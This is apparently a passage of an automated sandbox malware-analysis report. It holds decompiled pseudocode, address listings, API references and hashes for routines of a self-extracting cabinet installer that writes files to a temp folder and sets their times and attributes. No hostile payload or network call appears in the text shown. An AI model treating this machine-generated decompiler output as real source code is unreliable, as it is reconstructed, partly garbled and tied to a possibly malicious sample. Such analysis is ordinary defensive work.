                                                                                                                                                                                                        				long _t51;
                                                                                                                                                                                                        				char* _t58;
                                                                                                                                                                                                        				long _t59;
                                                                                                                                                                                                        				char* _t63;
                                                                                                                                                                                                        				long _t64;
                                                                                                                                                                                                        				CHAR* _t71;
                                                                                                                                                                                                        				CHAR* _t74;
                                                                                                                                                                                                        				int _t75;
                                                                                                                                                                                                        				signed int _t76;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t69 = __edx;
                                                                                                                                                                                                        				_t29 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                        				_v8 = _t30;
                                                                                                                                                                                                        				_t75 = _a8;
                                                                                                                                                                                                        				if( *0xc91d8 == 0) {
                                                                                                                                                                                                        					_t32 = _a4;
                                                                                                                                                                                                        					__eflags = _t32;
                                                                                                                                                                                                        					if(_t32 == 0) {
                                                                                                                                                                                                        						_t33 = E000C4E99(_t75);
                                                                                                                                                                                                        						L35:
                                                                                                                                                                                                        						return E000C6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t35 = _t32 - 1;
                                                                                                                                                                                                        					__eflags = _t35;
                                                                                                                                                                                                        					if(_t35 == 0) {
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						_t33 = 0;
                                                                                                                                                                                                        						goto L35;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t36 = _t35 - 1;
                                                                                                                                                                                                        					__eflags = _t36;
                                                                                                                                                                                                        					if(_t36 == 0) {
                                                                                                                                                                                                        						_t37 =  *0xc8584; // 0x0
                                                                                                                                                                                                        						__eflags = _t37;
                                                                                                                                                                                                        						if(_t37 != 0) {
                                                                                                                                                                                                        							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t54 = 0xc91e4;
                                                                                                                                                                                                        						_t58 = 0xc91e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t38 =  *_t58;
                                                                                                                                                                                                        							_t58 =  &(_t58[1]);
                                                                                                                                                                                                        							__eflags = _t38;
                                                                                                                                                                                                        						} while (_t38 != 0);
                                                                                                                                                                                                        						_t59 = _t58 - 0xc91e5;
                                                                                                                                                                                                        						__eflags = _t59;
                                                                                                                                                                                                        						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                        						_t73 =  &(_t71[1]);
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t39 =  *_t71;
                                                                                                                                                                                                        							_t71 =  &(_t71[1]);
                                                                                                                                                                                                        							__eflags = _t39;
                                                                                                                                                                                                        						} while (_t39 != 0);
                                                                                                                                                                                                        						_t69 = _t71 - _t73;
                                                                                                                                                                                                        						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                        						__eflags = _t30 - 0x104;
                                                                                                                                                                                                        						if(_t30 >= 0x104) {
                                                                                                                                                                                                        							L3:
                                                                                                                                                                                                        							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                        							goto L35;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t69 = 0xc91e4;
                                                                                                                                                                                                        						_t30 = E000C4702( &_v268, 0xc91e4,  *(_t75 + 4));
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(__eflags == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t41 = E000C476D( &_v268, __eflags);
                                                                                                                                                                                                        						__eflags = _t41;
                                                                                                                                                                                                        						if(_t41 == 0) {
                                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(0x180);
                                                                                                                                                                                                        						_t30 = E000C4980( &_v268, 0x8302); // executed
                                                                                                                                                                                                        						_t75 = _t30;
                                                                                                                                                                                                        						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                        						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t30 = E000C47E0( &_v268);
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0xc93f4 =  *0xc93f4 + 1;
                                                                                                                                                                                                        						_t33 = _t75;
                                                                                                                                                                                                        						goto L35;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t44 = _t36 - 1;
                                                                                                                                                                                                        					__eflags = _t44;
                                                                                                                                                                                                        					if(_t44 == 0) {
                                                                                                                                                                                                        						_t54 = 0xc91e4;
                                                                                                                                                                                                        						_t63 = 0xc91e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t45 =  *_t63;
                                                                                                                                                                                                        							_t63 =  &(_t63[1]);
                                                                                                                                                                                                        							__eflags = _t45;
                                                                                                                                                                                                        						} while (_t45 != 0);
                                                                                                                                                                                                        						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                        						_t64 = _t63 - 0xc91e5;
                                                                                                                                                                                                        						__eflags = _t64;
                                                                                                                                                                                                        						_t69 =  &(_t74[1]);
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t46 =  *_t74;
                                                                                                                                                                                                        							_t74 =  &(_t74[1]);
                                                                                                                                                                                                        							__eflags = _t46;
                                                                                                                                                                                                        						} while (_t46 != 0);
                                                                                                                                                                                                        						_t73 = _t74 - _t69;
                                                                                                                                                                                                        						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                        						__eflags = _t30 - 0x104;
                                                                                                                                                                                                        						if(_t30 >= 0x104) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t69 = 0xc91e4;
                                                                                                                                                                                                        						_t30 = E000C4702( &_v268, 0xc91e4,  *(_t75 + 4));
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                        						_t30 = E000C4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						E000C4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                        						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                        						__eflags = _t50;
                                                                                                                                                                                                        						if(_t50 != 0) {
                                                                                                                                                                                                        							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                        							__eflags = _t51;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t51 = 0x80;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t33 = 1;
                                                                                                                                                                                                        							goto L35;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t30 = _t44 - 1;
                                                                                                                                                                                                        					__eflags = _t30;
                                                                                                                                                                                                        					if(_t30 == 0) {
                                                                                                                                                                                                        						goto L3;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_a4 == 3) {
                                                                                                                                                                                                        					_t30 = E000C4B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L3;
                                                                                                                                                                                                        			}































                                                                                                                                                                                                        0x000c4cd0
                                                                                                                                                                                                        0x000c4cdb
                                                                                                                                                                                                        0x000c4ce0
                                                                                                                                                                                                        0x000c4ce2
                                                                                                                                                                                                        0x000c4cee
                                                                                                                                                                                                        0x000c4cf2
                                                                                                                                                                                                        0x000c4d0e
                                                                                                                                                                                                        0x000c4d0e
                                                                                                                                                                                                        0x000c4d11
                                                                                                                                                                                                        0x000c4e83
                                                                                                                                                                                                        0x000c4e88
                                                                                                                                                                                                        0x000c4e98
                                                                                                                                                                                                        0x000c4e98
                                                                                                                                                                                                        0x000c4d17
                                                                                                                                                                                                        0x000c4d17
                                                                                                                                                                                                        0x000c4d1a
                                                                                                                                                                                                        0x000c4d2f
                                                                                                                                                                                                        0x000c4d2f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c4d2f
                                                                                                                                                                                                        0x000c4d1c
                                                                                                                                                                                                        0x000c4d1c
                                                                                                                                                                                                        0x000c4d1f
                                                                                                                                                                                                        0x000c4dcb
                                                                                                                                                                                                        0x000c4dd0
                                                                                                                                                                                                        0x000c4dd2
                                                                                                                                                                                                        0x000c4ddd
                                                                                                                                                                                                        0x000c4ddd
                                                                                                                                                                                                        0x000c4de3
                                                                                                                                                                                                        0x000c4de8
                                                                                                                                                                                                        0x000c4ded
                                                                                                                                                                                                        0x000c4ded
                                                                                                                                                                                                        0x000c4def
                                                                                                                                                                                                        0x000c4df0
                                                                                                                                                                                                        0x000c4df0
                                                                                                                                                                                                        0x000c4df4
                                                                                                                                                                                                        0x000c4df4
                                                                                                                                                                                                        0x000c4df6
                                                                                                                                                                                                        0x000c4df9
                                                                                                                                                                                                        0x000c4dfc
                                                                                                                                                                                                        0x000c4dfc
                                                                                                                                                                                                        0x000c4dfe
                                                                                                                                                                                                        0x000c4dff
                                                                                                                                                                                                        0x000c4dff
                                                                                                                                                                                                        0x000c4e03
                                                                                                                                                                                                        0x000c4e08
                                                                                                                                                                                                        0x000c4e0a
                                                                                                                                                                                                        0x000c4e0f
                                                                                                                                                                                                        0x000c4d03
                                                                                                                                                                                                        0x000c4d03
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c4d03
                                                                                                                                                                                                        0x000c4e18
                                                                                                                                                                                                        0x000c4e20
                                                                                                                                                                                                        0x000c4e25
                                                                                                                                                                                                        0x000c4e27
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c4e33
                                                                                                                                                                                                        0x000c4e38
                                                                                                                                                                                                        0x000c4e3a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c4e40
                                                                                                                                                                                                        0x000c4e51
                                                                                                                                                                                                        0x000c4e56
                                                                                                                                                                                                        0x000c4e5b
                                                                                                                                                                                                        0x000c4e5e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c4e6a
                                                                                                                                                                                                        0x000c4e6f
                                                                                                                                                                                                        0x000c4e71
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c4e77
                                                                                                                                                                                                        0x000c4e7d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c4e7d
                                                                                                                                                                                                        0x000c4d25
                                                                                                                                                                                                        0x000c4d25
                                                                                                                                                                                                        0x000c4d28
                                                                                                                                                                                                        0x000c4d36
                                                                                                                                                                                                        0x000c4d3b
                                                                                                                                                                                                        0x000c4d40
                                                                                                                                                                                                        0x000c4d40
                                                                                                                                                                                                        0x000c4d42
                                                                                                                                                                                                        0x000c4d43
                                                                                                                                                                                                        0x000c4d43
                                                                                                                                                                                                        0x000c4d47
                                                                                                                                                                                                        0x000c4d4a
                                                                                                                                                                                                        0x000c4d4a
                                                                                                                                                                                                        0x000c4d4c
                                                                                                                                                                                                        0x000c4d4f
                                                                                                                                                                                                        0x000c4d4f
                                                                                                                                                                                                        0x000c4d51
                                                                                                                                                                                                        0x000c4d52
                                                                                                                                                                                                        0x000c4d52
                                                                                                                                                                                                        0x000c4d56
                                                                                                                                                                                                        0x000c4d5b
                                                                                                                                                                                                        0x000c4d5d
                                                                                                                                                                                                        0x000c4d62
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c4d67
                                                                                                                                                                                                        0x000c4d6f
                                                                                                                                                                                                        0x000c4d74
                                                                                                                                                                                                        0x000c4d76
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c4d7c
                                                                                                                                                                                                        0x000c4d84
                                                                                                                                                                                                        0x000c4d89
                                                                                                                                                                                                        0x000c4d8b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c4d94
                                                                                                                                                                                                        0x000c4d99
                                                                                                                                                                                                        0x000c4d9e
                                                                                                                                                                                                        0x000c4da1
                                                                                                                                                                                                        0x000c4daa
                                                                                                                                                                                                        0x000c4daa
                                                                                                                                                                                                        0x000c4da3
                                                                                                                                                                                                        0x000c4da3
                                                                                                                                                                                                        0x000c4da3
                                                                                                                                                                                                        0x000c4db5
                                                                                                                                                                                                        0x000c4dbb
                                                                                                                                                                                                        0x000c4dbd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c4dc3
                                                                                                                                                                                                        0x000c4dc5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c4dc5
                                                                                                                                                                                                        0x000c4dbd
                                                                                                                                                                                                        0x000c4d2a
                                                                                                                                                                                                        0x000c4d2a
                                                                                                                                                                                                        0x000c4d2d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c4d2d
                                                                                                                                                                                                        0x000c4cf8
                                                                                                                                                                                                        0x000c4cfd
                                                                                                                                                                                                        0x000c4d02
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 000C4DB5
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 000C4DDD
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFileItemText
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                        • API String ID: 3625706803-3647970563
                                                                                                                                                                                                        • Opcode ID: 246a6f7ae976e748805e3be07a6a709795960443d149dfc8980d234ca2562fcd
                                                                                                                                                                                                        • Instruction ID: 5353f01d634d4017fa0c724d5ea54257380a604b845f0b1224f125af97a396fb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 246a6f7ae976e748805e3be07a6a709795960443d149dfc8980d234ca2562fcd
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F441F3366041059ACB65AF28D9A8FFE73E5FB45300F14466CE88397296DB31DE4AC750
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C4C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                        				struct _FILETIME _v12;
                                                                                                                                                                                                        				struct _FILETIME _v20;
                                                                                                                                                                                                        				FILETIME* _t14;
                                                                                                                                                                                                        				int _t15;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t21 = __ecx * 0x18;
                                                                                                                                                                                                        				if( *((intOrPtr*)(_t21 + 0xc8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t14 =  &_v12;
                                                                                                                                                                                                        					_t15 = SetFileTime( *(_t21 + 0xc8d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                        					if(_t15 == 0) {
                                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        0x000c4c40
                                                                                                                                                                                                        0x000c4c4a
                                                                                                                                                                                                        0x000c4c8d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c4c70
                                                                                                                                                                                                        0x000c4c70
                                                                                                                                                                                                        0x000c4c7e
                                                                                                                                                                                                        0x000c4c86
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c4c8a

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • DosDateTimeToFileTime.KERNEL32 ref: 000C4C54
                                                                                                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000C4C66
                                                                                                                                                                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 000C4C7E
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Time$File$DateLocal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2071732420-0
                                                                                                                                                                                                        • Opcode ID: 29091d95e29611166825c493226ede7adc4e9214c0fe358d6f84c8656a8f58ab
                                                                                                                                                                                                        • Instruction ID: 43df8c0840b1627566a39605ecfc43b61660c1217970b14747e48d5ea97cbe8e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 29091d95e29611166825c493226ede7adc4e9214c0fe358d6f84c8656a8f58ab
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59F09672A0110C6F9BA4DFB5CC98EFF77ECFB05345744452EA816C10A0EA34D914C760
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E000C487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                        				void* _t7;
                                                                                                                                                                                                        				CHAR* _t11;
                                                                                                                                                                                                        				long _t18;
                                                                                                                                                                                                        				long _t23;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t11 = __ecx;
                                                                                                                                                                                                        				asm("sbb edi, edi");
                                                                                                                                                                                                        				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                        				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                        					asm("sbb esi, esi");
                                                                                                                                                                                                        					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                        						asm("sbb esi, esi");
                                                                                                                                                                                                        						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t23 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                        				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                        					return _t7;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E000C490C(_t11);
                                                                                                                                                                                                        					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}







                                                                                                                                                                                                        0x000c4880
                                                                                                                                                                                                        0x000c488c
                                                                                                                                                                                                        0x000c4894
                                                                                                                                                                                                        0x000c48a0
                                                                                                                                                                                                        0x000c48c9
                                                                                                                                                                                                        0x000c48ce
                                                                                                                                                                                                        0x000c48a2
                                                                                                                                                                                                        0x000c48a8
                                                                                                                                                                                                        0x000c48b7
                                                                                                                                                                                                        0x000c48bc
                                                                                                                                                                                                        0x000c48aa
                                                                                                                                                                                                        0x000c48ac
                                                                                                                                                                                                        0x000c48ac
                                                                                                                                                                                                        0x000c48a8
                                                                                                                                                                                                        0x000c48de
                                                                                                                                                                                                        0x000c48e7
                                                                                                                                                                                                        0x000c490b
                                                                                                                                                                                                        0x000c48ee
                                                                                                                                                                                                        0x000c48f0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c4902

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,000C4A23,?,000C4F67,*MEMCAB,00008000,00000180), ref: 000C48DE
                                                                                                                                                                                                        • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,000C4F67,*MEMCAB,00008000,00000180), ref: 000C4902
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                        • Opcode ID: 24b3bb3f2bcd20f5195ca59b7645f91b74486ea8f627fc186f3edbeacde86478
                                                                                                                                                                                                        • Instruction ID: c7ea0389b88c5a3e78a0208e3a6a1c23efd209fa8db7e7310a5b0ee168a6a016
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 24b3bb3f2bcd20f5195ca59b7645f91b74486ea8f627fc186f3edbeacde86478
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3014BA3E1157426F36442294C98FBF555CEB9A734F1B0339BDAAE71D2D9644C0481E0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E000C4AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				int _t12;
                                                                                                                                                                                                        				signed int _t14;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				struct HWND__* _t21;
                                                                                                                                                                                                        				signed int _t24;
                                                                                                                                                                                                        				signed int _t25;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 =  *0xc858c; // 0x268
                                                                                                                                                                                                        				_t9 = E000C3680(_t20);
                                                                                                                                                                                                        				if( *0xc91d8 == 0) {
                                                                                                                                                                                                        					_push(_t24);
                                                                                                                                                                                                        					_t12 = WriteFile( *(0xc8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						_t25 = _a12;
                                                                                                                                                                                                        						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        							_t14 =  *0xc9400; // 0xf8800
                                                                                                                                                                                                        							_t15 = _t14 + _t25;
                                                                                                                                                                                                        							 *0xc9400 = _t15;
                                                                                                                                                                                                        							if( *0xc8184 != 0) {
                                                                                                                                                                                                        								_t21 =  *0xc8584; // 0x0
                                                                                                                                                                                                        								if(_t21 != 0) {
                                                                                                                                                                                                        									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xc93f8, 0);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return _t25;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					return _t9 | 0xffffffff;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}











                                                                                                                                                                                                        0x000c4ad5
                                                                                                                                                                                                        0x000c4adb
                                                                                                                                                                                                        0x000c4ae7
                                                                                                                                                                                                        0x000c4aee
                                                                                                                                                                                                        0x000c4b05
                                                                                                                                                                                                        0x000c4b0d
                                                                                                                                                                                                        0x000c4b14
                                                                                                                                                                                                        0x000c4b1a
                                                                                                                                                                                                        0x000c4b1c
                                                                                                                                                                                                        0x000c4b21
                                                                                                                                                                                                        0x000c4b2a
                                                                                                                                                                                                        0x000c4b2f
                                                                                                                                                                                                        0x000c4b31
                                                                                                                                                                                                        0x000c4b39
                                                                                                                                                                                                        0x000c4b54
                                                                                                                                                                                                        0x000c4b54
                                                                                                                                                                                                        0x000c4b39
                                                                                                                                                                                                        0x000c4b2f
                                                                                                                                                                                                        0x000c4b0f
                                                                                                                                                                                                        0x000c4b0f
                                                                                                                                                                                                        0x000c4b0f
                                                                                                                                                                                                        0x000c4b5e
                                                                                                                                                                                                        0x000c4ae9
                                                                                                                                                                                                        0x000c4aed
                                                                                                                                                                                                        0x000c4aed

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 000C3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 000C369F
                                                                                                                                                                                                          • Part of subcall function 000C3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000C36B2
                                                                                                                                                                                                          • Part of subcall function 000C3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000C36DA
                                                                                                                                                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 000C4B05
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1084409-0
                                                                                                                                                                                                        • Opcode ID: cd7da857b59855ea56390d106ff1730eb8e99665a7d37260c6f749b626f3d2f9
                                                                                                                                                                                                        • Instruction ID: 865a8708d7ea7da65126fbbc8326f97acb88ff5df07108fcaecab34595ddf826
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cd7da857b59855ea56390d106ff1730eb8e99665a7d37260c6f749b626f3d2f9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D019E31240205ABEB148F68DC29FAA7799FB44726F18C229FD39971E0CB74DC11CB80
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C658A(char* __ecx, void* __edx, char* _a4) {
